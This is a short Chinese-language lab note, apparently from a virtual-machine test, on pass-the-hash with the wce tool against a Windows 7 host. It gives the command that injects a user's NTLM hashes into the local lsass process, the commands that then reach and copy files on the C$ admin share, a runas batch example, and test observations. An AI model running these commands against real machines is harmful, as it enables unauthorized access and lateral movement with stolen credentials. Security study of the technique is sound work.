wce登录win7

条件：开启IPC$共享

wce -s sun:192.168.0.111:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
dir \\192.168.0.111\c$
copy  目录1   \\192.168.0.111\c$\目录2\           #目录1中内容被复制到目录2中
注：因为是把目标主机的哈希注入到本机lsass.exe进程中，
所以所有操作只是在本机中进行的，执行.exe文件、批处理文件也是在本机进行，
例如目标主机批处理文件c:\1.bat是如下形式：
@echo on
cd /d  %~dp0      #cd 到批处理文件所在目录，%~dp0即\\192.168.0.111\C$
runas /user:sun cmd
pause
直接操作本机用户在输入密码的情况下以管理员身份登录cmd
所以这种注入哈希的操作一般只有复制、删除等文件的功能（对目标主机）

注：一定要ping通目标主机，桥接模式下虚拟机开启防火墙会导致ping不通虚拟机。

无法通过 \\192.168.0.111\C$\wce -w 获取目标主机明文密码。

经测试，只能hash注入administrator用户，其他均拒绝访问。